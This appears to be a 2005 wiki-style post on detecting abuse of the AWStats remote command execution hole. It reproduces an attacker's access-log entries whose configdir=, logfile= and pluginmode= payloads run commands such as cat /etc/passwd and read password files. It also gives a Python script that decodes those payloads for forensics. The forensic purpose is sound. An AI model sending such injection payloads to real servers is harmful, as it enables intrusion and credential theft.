
Many webservers running AWStats are remotely exploitable

So basically, if you run AWStats to parse your weblogs and installed it before 2005... well then, have fun and use this if you forget the ftp password to your webserver..

Remote command execution through AWStats:
http://www.securiteam.com/exploits/5ZP0F1FF5U.html


How do I know if someone has abused my AWStats installation?

If your Apache weblogs look like this:

boras.tokroot.com - - [20/Nov/2005:00:46:32 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?pluginmode=:system(\"echo+SILENTIUM;uname%20-a;echo+anacron_group_italy\"); HTTP/1.0" 200 776
boras.tokroot.com - - [20/Nov/2005:00:46:38 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:00:46:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?update=1&logfile=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 219
boras.tokroot.com - - [20/Nov/2005:00:46:52 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:00:46:58 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;who;echo+anacron_group_italy;echo| HTTP/1.0" 200 541
boras.tokroot.com - - [20/Nov/2005:00:47:04 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;pwd;echo+anacron_group_italy;echo| HTTP/1.0" 200 574
boras.tokroot.com - - [20/Nov/2005:00:47:19 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 6314
boras.tokroot.com - - [20/Nov/2005:00:50:27 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fmnt%2fdemoscene;echo+anacron_group_italy;echo| HTTP/1.0" 200 640
boras.tokroot.com - - [20/Nov/2005:00:50:43 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:00:51:39 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fcore;echo+anacron_group_italy;echo| HTTP/1.0" 200 551
boras.tokroot.com - - [20/Nov/2005:00:51:44 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:00:52:12 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww;echo+anacron_group_italy;echo| HTTP/1.0" 200 753
boras.tokroot.com - - [20/Nov/2005:00:52:27 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww%2fpasswords;echo+anacron_group_italy;echo| HTTP/1.0" 200 629
boras.tokroot.com - - [20/Nov/2005:00:52:46 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fpassword.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 598
boras.tokroot.com - - [20/Nov/2005:00:53:02 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww%2fpasswords;echo+anacron_group_italy;echo| HTTP/1.0" 200 629
boras.tokroot.com - - [20/Nov/2005:00:53:36 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fzx81.password.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 597
boras.tokroot.com - - [20/Nov/2005:00:54:46 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fgroup.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 598
boras.tokroot.com - - [20/Nov/2005:00:55:17 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2f;echo+anacron_group_italy;echo| HTTP/1.0" 200 655
boras.tokroot.com - - [20/Nov/2005:00:55:23 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fftp;echo+anacron_group_italy;echo| HTTP/1.0" 200 716
boras.tokroot.com - - [20/Nov/2005:00:56:34 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 564
boras.tokroot.com - - [20/Nov/2005:00:56:39 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 6314
boras.tokroot.com - - [20/Nov/2005:00:59:13 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:01:01:04 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:01:01:16 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2feuphoria;echo+anacron_group_italy;echo| HTTP/1.0" 200 745
boras.tokroot.com - - [20/Nov/2005:01:02:21 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:01:02:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fvoid;echo+anacron_group_italy;echo| HTTP/1.0" 200 663
boras.tokroot.com - - [20/Nov/2005:01:03:01 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20ps%20aux;echo+anacron_group_italy;echo| HTTP/1.0" 200 548
boras.tokroot.com - - [20/Nov/2005:01:03:16 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20-l%20%2fhome%2fvoid;echo+anacron_group_italy;echo| HTTP/1.0" 200 775
boras.tokroot.com - - [20/Nov/2005:01:03:31 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;netstat;echo+anacron_group_italy;echo| HTTP/1.0" 200 5357
boras.tokroot.com - - [20/Nov/2005:01:07:37 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fmcdrill;echo+anacron_group_italy;echo| HTTP/1.0" 200 554
boras.tokroot.com - - [20/Nov/2005:01:08:13 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fjason;echo+anacron_group_italy;echo| HTTP/1.0" 200 583
boras.tokroot.com - - [20/Nov/2005:01:08:23 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 578
boras.tokroot.com - - [20/Nov/2005:01:08:30 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 32778
boras.tokroot.com - - [20/Nov/2005:01:08:33 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 32778
boras.tokroot.com - - [20/Nov/2005:01:13:42 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fdoofy;echo+anacron_group_italy;echo| HTTP/1.0" 200 553
boras.tokroot.com - - [20/Nov/2005:01:13:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fdoofy;echo+anacron_group_italy;echo| HTTP/1.0" 200 552

Well, then you have someone abusing your server, looking around in your files.

Note that the commands in the accessed URLs are the commands that get run on the server as the www user, by injecting several commands into the configdir= argument (the first lines do the same through pluginmode= and logfile=). By looking at these commands you can get a picture of what the offender (@boras.tokroot.com in this case) has done.

All commands issued by the offender can easily be found by running a simple parse command on the access_log like this:
$ cat access_log | grep awstats | grep echo

or in the case above.. if the offender has actually used the SILENTIUM anacron_group_italy exploit unchanged.. lol, well then just look for the SILENTIUM rows.. They shine like NEON in the weblog :)
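The grep above finds the rows; the script below (an added example, not part of the original wiki page) goes one step further and rebuilds the offender's command timeline by URL-decoding the injected configdir=, logfile= and pluginmode= payloads, dropping the exploit's echo markers, and flagging commands that touched password files. Three request lines are copied from the log excerpt above, plus one constructed benign request.

```python
import re
from urllib.parse import unquote_plus

# Apache access_log fields needed here: client host, timestamp, request URL.
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+)')
# The two injection forms visible in the excerpt:
#   configdir=|cmds|  (logfile=|cmds| works the same)  and  pluginmode=:system("cmds");
INJECT_RE = re.compile(
    r'(?:configdir|logfile)=\|(?P<pipe>[^|]*)\||pluginmode=:system\((?P<sys>.*?)\);')
# The exploit wraps its real commands in echo markers; they are noise in a timeline.
MARKERS = {'echo', 'echo SILENTIUM', 'echo anacron_group_italy'}
SENSITIVE = ('/etc/passwd', '/etc/shadow', 'password')  # substrings worth flagging

def injected_commands(url):
    """Return the shell commands injected into an awstats.pl URL, or [] if none."""
    m = INJECT_RE.search(url)
    if not m:
        return []
    raw = m.group('pipe') if m.group('pipe') is not None else m.group('sys')
    # unquote_plus turns + and %20 into spaces and %2f into /; strip escaped quotes.
    decoded = unquote_plus(raw).replace('\\"', '').replace('"', '')
    cmds = [c.strip() for c in decoded.split(';')]
    return [c for c in cmds if c and c not in MARKERS]

def parse_log(text):
    """Return (host, timestamp, [commands]) for each awstats request carrying an injection."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or 'awstats.pl' not in m.group('url'):
            continue
        cmds = injected_commands(m.group('url'))
        if cmds:
            events.append((m.group('host'), m.group('ts'), cmds))
    return events

def flag_sensitive(events):
    """Commands from the timeline that read password-related files."""
    return [c for _, _, cmds in events for c in cmds if any(s in c for s in SENSITIVE)]

# Sample input: three lines copied from the excerpt above, plus one constructed clean request.
SAMPLE_LOG = (
    'boras.tokroot.com - - [20/Nov/2005:00:46:32 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?pluginmode=:system(\\"echo+SILENTIUM;uname%20-a;echo+anacron_group_italy\\"); HTTP/1.0" 200 776\n'
    'boras.tokroot.com - - [20/Nov/2005:00:47:19 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 6314\n'
    'boras.tokroot.com - - [20/Nov/2005:00:52:46 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fpassword.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 598\n'
    'boras.tokroot.com - - [20/Nov/2005:00:58:00 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?config=site HTTP/1.0" 200 12000\n'
)

if __name__ == '__main__':
    for host, ts, cmds in parse_log(SAMPLE_LOG):
        print(f'{ts} {host}: ' + '; '.join(cmds))
    print('sensitive:', flag_sensitive(parse_log(SAMPLE_LOG)))
```

Run it against the real access_log by replacing SAMPLE_LOG with the file contents; the benign awstats request in the sample shows that ordinary report views are not reported.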

If it happens that you get unauthorized accesses in your SSH daemon log, with logins using the usernames from the stolen password file, then you might get a BINGO: in this case, the offender's home IP!

stay tuned for more...
